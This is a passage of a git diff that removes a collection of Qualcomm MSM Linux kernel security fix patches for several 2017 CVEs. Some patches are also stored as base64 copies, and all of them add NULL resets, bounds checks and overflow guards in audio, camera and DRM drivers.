L21zbTh4NjAtcGNtLmMKQEAgLTUzNCw2ICs1MzQsNyBAQAogCW1zbV9jbGVhcl9zZXNzaW9uX2lkKHBydGQtPnNlc3Npb25faWQpOwogCXE2YXNtX2F1ZGlvX2NsaWVudF9mcmVlKHBydGQtPmF1ZGlvX2NsaWVudCk7CiAJa2ZyZWUocHJ0ZCk7CisJcnVudGltZS0+cHJpdmF0ZV9kYXRhID0gTlVMTDsKIAogCXJldHVybiAwOwogfQpAQCAtNjI3LDYgKzYyOCw3IEBACiAJbXNtX2NsZWFyX3Nlc3Npb25faWQocHJ0ZC0+c2Vzc2lvbl9pZCk7CiAJcTZhc21fYXVkaW9fY2xpZW50X2ZyZWUocHJ0ZC0+YXVkaW9fY2xpZW50KTsKIAlrZnJlZShwcnRkKTsKKwlydW50aW1lLT5wcml2YXRlX2RhdGEgPSBOVUxMOwogCiAJcmV0dXJuIDA7CiB9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch b/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch
deleted file mode 100644
index 2db95a61..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8246/4.4/0005.patch
+++ /dev/null
@@ -1,93 +0,0 @@
-From 9734b72ae21eca557540c3c42d356dd131a20004 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free
-
-Unsanitized pointer after kfree leads to potential risk.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c     | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c   | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c      | 3 +++
- 4 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index 7f032dc..9a40dad 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1586,6 +1586,7 @@ static int msm_compr_playback_free(struct snd_compr_stream *cstream)
- 	kfree(pdata->dec_params[soc_prtd->dai_link->be_id]);
- 	pdata->dec_params[soc_prtd->dai_link->be_id] = NULL;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-@@ -1645,6 +1646,7 @@ static int msm_compr_capture_free(struct snd_compr_stream *cstream)
- 	q6asm_audio_client_free(ac);
- 
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index d65108e..b1a1ea5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -684,6 +684,7 @@ done:
- 	mutex_unlock(&prtd->lock);
- 	prtd->prepared--;
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 	return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-index 33c5b64..9c24712 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-@@ -570,6 +570,8 @@ static int msm_pcm_close(struct snd_pcm_substream *substream)
- 					 SNDRV_PCM_STREAM_PLAYBACK :
- 					 SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
-+
- 	return 0;
- }
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index e14f410..7928c37 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -804,6 +804,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 						SNDRV_PCM_STREAM_PLAYBACK);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
-+
- 	return 0;
- }
- 
-@@ -909,6 +911,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream)
- 	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
- 		SNDRV_PCM_STREAM_CAPTURE);
- 	kfree(prtd);
-+	runtime->private_data = NULL;
- 
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch
deleted file mode 100644
index b7337300..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8247/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 84f8c42e5d848b1d04f49d253f98296e8c2280b9 Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
-Date: Fri, 7 Apr 2017 11:16:29 +0530
-Subject: msm: camera: Allow driver file to be opend only once.
-
-Use proper synchronization to ensure driver file is opened
-only once.
-
-CRs-Fixed: 2023513
-Change-Id: I71e55e2d487fe561d3f596590b3e8102c5e921b5
-Signed-off-by: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/msm.c | 4 +---
- 1 file changed, 1 insertion(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/msm.c b/drivers/media/platform/msm/camera_v2/msm.c
-index c2b42a8..d8bdef5 100644
---- a/drivers/media/platform/msm/camera_v2/msm.c
-+++ b/drivers/media/platform/msm/camera_v2/msm.c
-@@ -1012,11 +1012,9 @@ static int msm_open(struct file *filep)
- 	BUG_ON(!pvdev);
- 
- 	/* !!! only ONE open is allowed !!! */
--	if (atomic_read(&pvdev->opened))
-+	if (atomic_cmpxchg(&pvdev->opened, 0, 1))
- 		return -EBUSY;
- 
--	atomic_set(&pvdev->opened, 1);
--
- 	spin_lock_irqsave(&msm_pid_lock, flags);
- 	msm_pid = get_pid(task_pid(current));
- 	spin_unlock_irqrestore(&msm_pid_lock, flags);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch
deleted file mode 100644
index 93ed6a1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8250/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 9be5b16de622c2426408425e3df29e945cd21d37 Mon Sep 17 00:00:00 2001
-From: Kasin Li <donglil@codeaurora.org>
-Date: Wed, 22 Feb 2017 18:25:36 +0800
-Subject: drm/msm: Fix potential buffer overflow issue
-
-In function submit_create, if nr_cmds or nr_bos is assigned with
-negative value, the allocated buffer may be small than intended.
-Using this buffer will lead to buffer overflow issue.
-
-Change-Id: I0b61cccffd836e2dd3c859446470af4b6451b9ed
-Signed-off-by: Kasin Li <donglil@codeaurora.org>
----
- drivers/gpu/drm/msm/msm_gem_submit.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/gpu/drm/msm/msm_gem_submit.c b/drivers/gpu/drm/msm/msm_gem_submit.c
-index adbb0cb..fa9b641 100644
---- a/drivers/gpu/drm/msm/msm_gem_submit.c
-+++ b/drivers/gpu/drm/msm/msm_gem_submit.c
-@@ -34,12 +34,15 @@ static inline void __user *to_user_ptr(u64 address)
- }
- 
- static struct msm_gem_submit *submit_create(struct drm_device *dev,
--		struct msm_gpu *gpu, int nr_cmds, int nr_bos)
-+		struct msm_gpu *gpu, uint32_t nr_cmds, uint32_t nr_bos)
- {
- 	struct msm_gem_submit *submit;
--	int sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
-+	uint64_t sz = sizeof(*submit) + (nr_bos * sizeof(submit->bos[0])) +
- 		(nr_cmds * sizeof(submit->cmd[0]));
- 
-+	if (sz > SIZE_MAX)
-+		return NULL;
-+
- 	submit = kmalloc(sz, GFP_TEMPORARY | __GFP_NOWARN | __GFP_NORETRY);
- 	if (submit) {
- 		submit->dev = dev;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch
deleted file mode 100644
index 8a334400..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8251/3.10/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 3a42f1b79ed696f29350f170c00f27712ae84a36 Mon Sep 17 00:00:00 2001
-From: Maggie White <maggiewhite@google.com>
-Date: Wed, 5 Jul 2017 13:00:40 -0700
-Subject: msm: camera: isp: fix for out of bound access array
-
-There is no bound check in stream_cfg_cmd->num_streams and it's used in
-several places as a maximum index into the stream_cfg_cmd->stream_handle
-array which has a size of 15. Current code didn't check the maximum
-index to make sure it didn't exceed the array size.
-
-Bug: 62379525
-Change-Id: Idcf639486d235551882dafc34d9e798d78c70bf0
-Signed-off-by: Maggie White <maggiewhite@google.com>
----
- .../platform/msm/camera_v2/isp/msm_isp_stats_util.c   | 19 +++++++++++++++++++
- 1 file changed, 19 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 82da3e0..43a2c77 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -550,6 +550,12 @@ static int msm_isp_stats_update_cgc_override(struct vfe_device *vfe_dev,
- 	int i;
- 	uint32_t stats_mask = 0, idx;
- 
-+	if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s invalid num_streams %d\n", __func__,
-+			stream_cfg_cmd->num_streams);
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
- 
-@@ -630,6 +636,13 @@ static int msm_isp_start_stats_stream(struct vfe_device *vfe_dev,
- 		stats_data->stream_info);
- 	if (rc < 0)
- 		return rc;
-+
-+	if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s invalid num_streams %d\n", __func__,
-+			stream_cfg_cmd->num_streams);
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
- 
-@@ -702,6 +715,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device *vfe_dev,
- 	num_stats_comp_mask =
- 		vfe_dev->hw_info->stats_hw_info->num_stats_comp_mask;
- 
-+	if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s invalid num_streams %d\n", __func__,
-+			stream_cfg_cmd->num_streams);
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch
deleted file mode 100644
index 8b96d464..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8251/4.4/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 771254edea3486535453dbb76d090cd6bcf92af9 Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
-Date: Sat, 4 Mar 2017 12:05:44 +0530
-Subject: msm: camera: isp: fix for out of bound access array
-
-There is no bound check in stream_cfg_cmd->num_streams,
-in functions msm_isp_check_stream_cfg_cmd and
-msm_isp_stats_update_cgc_override num_streams is used as
-the index for stream_cfg_cmd->stream_handle array which
-has a size of 15. Current code did not check the num_streams
-to make sure that did not exceed the array size
-
-CRs-Fixed: 2006015
-
-Change-Id: I7f195c764a4e6c12e4f7c680bc3c9aa7b078e625
-Signed-off-by: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 11 +++++++++++
- 1 file changed, 11 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index f40af6e..b38226a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -832,6 +832,12 @@ static int msm_isp_stats_update_cgc_override(struct vfe_device *vfe_dev,
- 	struct msm_vfe_stats_stream *stream_info;
- 	int k;
- 
-+	if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s invalid num_streams %d\n", __func__,
-+			stream_cfg_cmd->num_streams);
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
- 
-@@ -961,6 +967,11 @@ static int msm_isp_check_stream_cfg_cmd(struct vfe_device *vfe_dev,
- 	int vfe_idx;
- 	uint32_t stats_idx[MSM_ISP_STATS_MAX];
- 
-+	if (stream_cfg_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+		pr_err("%s invalid num_streams %d\n", __func__,
-+			stream_cfg_cmd->num_streams);
-+		return -EINVAL;
-+	}
- 	memset(stats_idx, 0, sizeof(stats_idx));
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch
deleted file mode 100644
index f13ac465..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8253/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From a5f07894058c4198f61e533d727b343c5be879b0 Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 15 Nov 2016 12:26:47 -0800
-Subject: msm: camera: sensor: Add boundary check for cci master
-
-Add boundary check for cci master in i2c_read.
-This value is passed from userpsace. If user sends an
-invalid number for master there is a possibility of
-accessing unintended buffer.
-
-This change addresses the issue.
-
-Crs-Fixed: 1086764
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Change-Id: Ice3bde902aea96382ceb4dfddfd28a5ea89c183d
----
- .../media/platform/msm/camera_v2/sensor/cci/msm_cci.c  | 18 +++++++++++++-----
- 1 file changed, 13 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index b1c2382..2412ed2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -776,10 +776,18 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- 	enum cci_i2c_queue_t queue = QUEUE_1;
- 	struct cci_device *cci_dev = NULL;
- 	struct msm_camera_cci_i2c_read_cfg *read_cfg = NULL;
-+
- 	CDBG("%s line %d\n", __func__, __LINE__);
- 	cci_dev = v4l2_get_subdevdata(sd);
- 	master = c_ctrl->cci_info->cci_i2c_master;
- 	read_cfg = &c_ctrl->cfg.cci_i2c_read_cfg;
-+
-+	if (master >= MASTER_MAX || master < 0) {
-+		pr_err("%s:%d Invalid I2C master %d\n",
-+			__func__, __LINE__, master);
-+		return -EINVAL;
-+	}
-+
- 	mutex_lock(&cci_dev->cci_master_info[master].mutex_q[queue]);
- 
- 	/* Set the I2C Frequency */
-@@ -1004,11 +1012,6 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 	enum cci_i2c_master_t master;
- 
- 	cci_dev = v4l2_get_subdevdata(sd);
--	if (c_ctrl->cci_info->cci_i2c_master >= MASTER_MAX
--			|| c_ctrl->cci_info->cci_i2c_master < 0) {
--		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
--		return -EINVAL;
--	}
- 	if (cci_dev->cci_state != CCI_STATE_ENABLED) {
- 		pr_err("%s invalid cci state %d\n",
- 			__func__, cci_dev->cci_state);
-@@ -1539,6 +1542,11 @@ static int32_t msm_cci_write(struct v4l2_subdev *sd,
- 		return rc;
- 	}
- 
-+	if (c_ctrl->cci_info->cci_i2c_master >= MASTER_MAX
-+			|| c_ctrl->cci_info->cci_i2c_master < 0) {
-+		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	master = c_ctrl->cci_info->cci_i2c_master;
- 	cci_master_info = &cci_dev->cci_master_info[master];
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch
deleted file mode 100644
index 24e650c5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 338a5cecf0f839331f0a58bff8aaae79e134799e Mon Sep 17 00:00:00 2001
-From: Fred Oh <fred@codeaurora.org>
-Date: Tue, 07 Apr 2015 19:22:29 -0700
-Subject: [PATCH] ASoC: msm: qdsp6v2: validate audio client in callback
-
-In case of single stream multiple device(SSMD) use-case audio session is
-freed on first EOS. There are some chance to crash when 2nd EOS event is
-reached with some delay. This make sure return properly if audio client
-is not valid.
-
-Bug: 36252027
-Change-Id: I3711d8e039fc37e654ca5230f3dc8784c6dba071
-Signed-off-by: Fred Oh <fred@codeaurora.org>
-Signed-off-by: Siqi Lin <siqilin@google.com>
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index b17a440..4f486b1 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -329,6 +329,16 @@
- 	return -ENOMEM;
- }
- 
-+static bool q6asm_is_valid_audio_client(struct audio_client *ac)
-+{
-+	int n;
-+	for (n = 1; n <= SESSION_MAX; n++) {
-+		if (session[n] == ac)
-+			return 1;
-+	}
-+	return 0;
-+}
-+
- static void q6asm_session_free(struct audio_client *ac)
- {
- 	pr_debug("%s: sessionid[%d]\n", __func__, ac->session);
-@@ -905,7 +915,8 @@
- 		pr_err("ac or priv NULL\n");
- 		return -EINVAL;
- 	}
--	if (ac->session <= 0 || ac->session > 8) {
-+	if (ac->session <= 0 || ac->session > 8 ||
-+		!q6asm_is_valid_audio_client(ac)) {
- 		pr_err("%s:Session ID is invalid, session = %d\n", __func__,
- 			ac->session);
- 		return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64
deleted file mode 100644
index ab8dbc81..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAzMzhhNWNlY2YwZjgzOTMzMWYwYTU4YmZmOGFhYWU3OWUxMzQ3OTllIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBGcmVkIE9oIDxmcmVkQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBUdWUsIDA3IEFwciAyMDE1IDE5OjIyOjI5IC0wNzAwClN1YmplY3Q6IFtQQVRDSF0gQVNvQzogbXNtOiBxZHNwNnYyOiB2YWxpZGF0ZSBhdWRpbyBjbGllbnQgaW4gY2FsbGJhY2sKCkluIGNhc2Ugb2Ygc2luZ2xlIHN0cmVhbSBtdWx0aXBsZSBkZXZpY2UoU1NNRCkgdXNlLWNhc2UgYXVkaW8gc2Vzc2lvbiBpcwpmcmVlZCBvbiBmaXJzdCBFT1MuIFRoZXJlIGFyZSBzb21lIGNoYW5jZSB0byBjcmFzaCB3aGVuIDJuZCBFT1MgZXZlbnQgaXMKcmVhY2hlZCB3aXRoIHNvbWUgZGVsYXkuIFRoaXMgbWFrZSBzdXJlIHJldHVybiBwcm9wZXJseSBpZiBhdWRpbyBjbGllbnQKaXMgbm90IHZhbGlkLgoKQnVnOiAzNjI1MjAyNwpDaGFuZ2UtSWQ6IEkzNzExZDhlMDM5ZmMzN2U2NTRjYTUyMzBmM2RjODc4NGM2ZGJhMDcxClNpZ25lZC1vZmYtYnk6IEZyZWQgT2ggPGZyZWRAY29kZWF1cm9yYS5vcmc+ClNpZ25lZC1vZmYtYnk6IFNpcWkgTGluIDxzaXFpbGluQGdvb2dsZS5jb20+Ci0tLQoKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9xNmFzbS5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKaW5kZXggYjE3YTQ0MC4uNGY0ODZiMSAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKQEAgLTMyOSw2ICszMjksMTYgQEAKIAlyZXR1cm4gLUVOT01FTTsKIH0KIAorc3RhdGljIGJvb2wgcTZhc21faXNfdmFsaWRfYXVkaW9fY2xpZW50KHN0cnVjdCBhdWRpb19jbGllbnQgKmFjKQoreworCWludCBuOworCWZvciAobiA9IDE7IG4gPD0gU0VTU0lPTl9NQVg7IG4rKykgeworCQlpZiAoc2Vzc2lvbltuXSA9PSBhYykKKwkJCXJldHVybiAxOworCX0KKwlyZXR1cm4gMDsKK30KKwogc3RhdGljIHZvaWQgcTZhc21fc2Vzc2lvbl9mcmVlKHN0cnVjdCBhdWRpb19jbGllbnQgKmFjKQogewogCXByX2RlYnVnKCIlczogc2Vzc2lvbmlkWyVkXVxuIiwgX19mdW5jX18sIGFjLT5zZXNzaW9uKTsKQEAgLTkwNSw3ICs5MTUsOCBAQAogCQlwcl9lcnIoImFjIG9yIHByaXYgTlVMTFxuIik7CiAJCXJldHVybiAtRUlOVkFMOwogCX0KLQlpZiAoYWMtPnNlc3Npb24gPD0gMCB8fCBhYy0+c2Vzc2lvbiA+IDgpIHsKKwlpZiAoYWMtPnNlc3Npb24gPD0gMCB8fCBhYy0+c2Vzc2lvbiA+IDggfHwKKwkJIXE2YXNtX2lzX3ZhbGlkX2F1ZGlvX2NsaWVudChhYykpIHsKIAkJcHJfZXJyKCIlczpTZXNzaW9uIElEIGlzIGludmFsaWQsIHNlc3Npb24gPSAlZFxuIiwgX19mdW5jX18sCiAJCQlhYy0+c2Vzc2lvbik7CiAJCXJldHVybiAtRUlOVkFMOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch
deleted file mode 100644
index 81d9a798..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From fd6890b6c55c2ced15b7165cc658eb83dafc7eb1 Mon Sep 17 00:00:00 2001
-From: Aravind Kumar <akumark@codeaurora.org>
-Date: Mon, 11 May 2015 15:26:27 +0530
-Subject: [PATCH] ASoC: msm: qdsp6v2: check audio client pointer before accessing
-
-In the registered callback for q6asm, we are checking if
-the audio client pointer is valid and also, dereferencing it
-to get the session ID even though it could be invalid or expired.
-Return and exit immediately if the audio client pointer is
-invalid.
-
-Bug: 36252027
-CRs-Fixed: 832914
-Change-Id: I96b722b584a4b5adf8a33891abd75a320e76ea25
-Signed-off-by: Aravind Kumar <akumark@codeaurora.org>
-Signed-off-by: Siqi Lin <siqilin@google.com>
----
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 4f486b1..20e2cef 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -915,8 +915,13 @@
- 		pr_err("ac or priv NULL\n");
- 		return -EINVAL;
- 	}
--	if (ac->session <= 0 || ac->session > 8 ||
--		!q6asm_is_valid_audio_client(ac)) {
-+	if (!q6asm_is_valid_audio_client(ac)) {
-+		pr_err("%s: audio client pointer is invalid, ac = %p\n",
-+				__func__, ac);
-+		return -EINVAL;
-+	}
-+
-+	if (ac->session <= 0 || ac->session > 8) {
- 		pr_err("%s:Session ID is invalid, session = %d\n", __func__,
- 			ac->session);
- 		return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64
deleted file mode 100644
index eaed2539..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBmZDY4OTBiNmM1NWMyY2VkMTViNzE2NWNjNjU4ZWI4M2RhZmM3ZWIxIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBBcmF2aW5kIEt1bWFyIDxha3VtYXJrQGNvZGVhdXJvcmEub3JnPgpEYXRlOiBNb24sIDExIE1heSAyMDE1IDE1OjI2OjI3ICswNTMwClN1YmplY3Q6IFtQQVRDSF0gQVNvQzogbXNtOiBxZHNwNnYyOiBjaGVjayBhdWRpbyBjbGllbnQgcG9pbnRlciBiZWZvcmUgYWNjZXNzaW5nCgpJbiB0aGUgcmVnaXN0ZXJlZCBjYWxsYmFjayBmb3IgcTZhc20sIHdlIGFyZSBjaGVja2luZyBpZgp0aGUgYXVkaW8gY2xpZW50IHBvaW50ZXIgaXMgdmFsaWQgYW5kIGFsc28sIGRlcmVmZXJlbmNpbmcgaXQKdG8gZ2V0IHRoZSBzZXNzaW9uIElEIGV2ZW4gdGhvdWdoIGl0IGNvdWxkIGJlIGludmFsaWQgb3IgZXhwaXJlZC4KUmV0dXJuIGFuZCBleGl0IGltbWVkaWF0ZWx5IGlmIHRoZSBhdWRpbyBjbGllbnQgcG9pbnRlciBpcwppbnZhbGlkLgoKQnVnOiAzNjI1MjAyNwpDUnMtRml4ZWQ6IDgzMjkxNApDaGFuZ2UtSWQ6IEk5NmI3MjJiNTg0YTRiNWFkZjhhMzM4OTFhYmQ3NWEzMjBlNzZlYTI1ClNpZ25lZC1vZmYtYnk6IEFyYXZpbmQgS3VtYXIgPGFrdW1hcmtAY29kZWF1cm9yYS5vcmc+ClNpZ25lZC1vZmYtYnk6IFNpcWkgTGluIDxzaXFpbGluQGdvb2dsZS5jb20+Ci0tLQoKZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9xNmFzbS5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKaW5kZXggNGY0ODZiMS4uMjBlMmNlZiAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YXNtLmMKQEAgLTkxNSw4ICs5MTUsMTMgQEAKIAkJcHJfZXJyKCJhYyBvciBwcml2IE5VTExcbiIpOwogCQlyZXR1cm4gLUVJTlZBTDsKIAl9Ci0JaWYgKGFjLT5zZXNzaW9uIDw9IDAgfHwgYWMtPnNlc3Npb24gPiA4IHx8Ci0JCSFxNmFzbV9pc192YWxpZF9hdWRpb19jbGllbnQoYWMpKSB7CisJaWYgKCFxNmFzbV9pc192YWxpZF9hdWRpb19jbGllbnQoYWMpKSB7CisJCXByX2VycigiJXM6IGF1ZGlvIGNsaWVudCBwb2ludGVyIGlzIGludmFsaWQsIGFjID0gJXBcbiIsCisJCQkJX19mdW5jX18sIGFjKTsKKwkJcmV0dXJuIC1FSU5WQUw7CisJfQorCisJaWYgKGFjLT5zZXNzaW9uIDw9IDAgfHwgYWMtPnNlc3Npb24gPiA4KSB7CiAJCXByX2VycigiJXM6U2Vzc2lvbiBJRCBpcyBpbnZhbGlkLCBzZXNzaW9uID0gJWRcbiIsIF9fZnVuY19fLAogCQkJYWMtPnNlc3Npb24pOwogCQlyZXR1cm4gLUVJTlZBTDsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch
deleted file mode 100644
index 9e7246e8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8254/ANY/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
